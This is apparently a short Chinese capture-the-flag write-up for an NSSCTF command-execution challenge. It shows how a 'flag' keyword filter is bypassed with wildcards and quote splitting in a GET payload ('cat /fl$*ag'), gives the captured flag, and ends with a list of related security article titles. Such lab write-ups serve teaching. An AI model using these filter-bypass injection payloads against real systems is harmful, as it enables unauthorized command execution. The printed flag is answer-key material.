开启靶场,打开链接:
GET传参cmd,且对flag字符串进行了过滤
用\*绕过,fl*ag
用'绕过,f''lag或f'l'ag
当然还有别的方法绕过,就不一一赘述了(已经写了文档了《过滤绕过方法》)
/?cmd=cat /fl$*ag
成功得到flag:
NSSCTF{132e1f48-9cc3-4a6f-8608-91f32a8fa6f6}
相关推荐
淡水猫.1 小时前
ApacheSuperset CVE-2023-27524恰薯条的屑海鸥2 小时前
零基础在实践中学习网络安全-皮卡丘靶场(第九期-Unsafe Fileupload模块)(yakit方式)Bruce_Liuxiaowei2 小时前
Web安全深度解析:源码泄漏与未授权访问漏洞全指南CRMEB定制开发3 小时前
CRMEB 中 PHP 快递查询扩展实现:涵盖一号通、阿里云、腾讯云CRMEB定制开发3 小时前
PHP 打印扩展开发:从易联云到小鹅通的多驱动集成实践Bruce_Liuxiaowei4 小时前
PHP文件包含漏洞详解:原理、利用与防御2501_915106324 小时前
Flutter、React Native 项目如何搞定 iOS 上架?从构建 IPA 到上传 App Store 的实战流程全解析网安INF5 小时前
CVE-2023-25194源码分析与漏洞复现(Kafka JNDI注入)恰薯条的屑海鸥6 小时前
零基础在实践中学习网络安全-皮卡丘靶场(第十期-Over Permission 模块)Bruce_Liuxiaowei7 小时前
深入理解PHP安全漏洞:文件包含与SSRF攻击全解析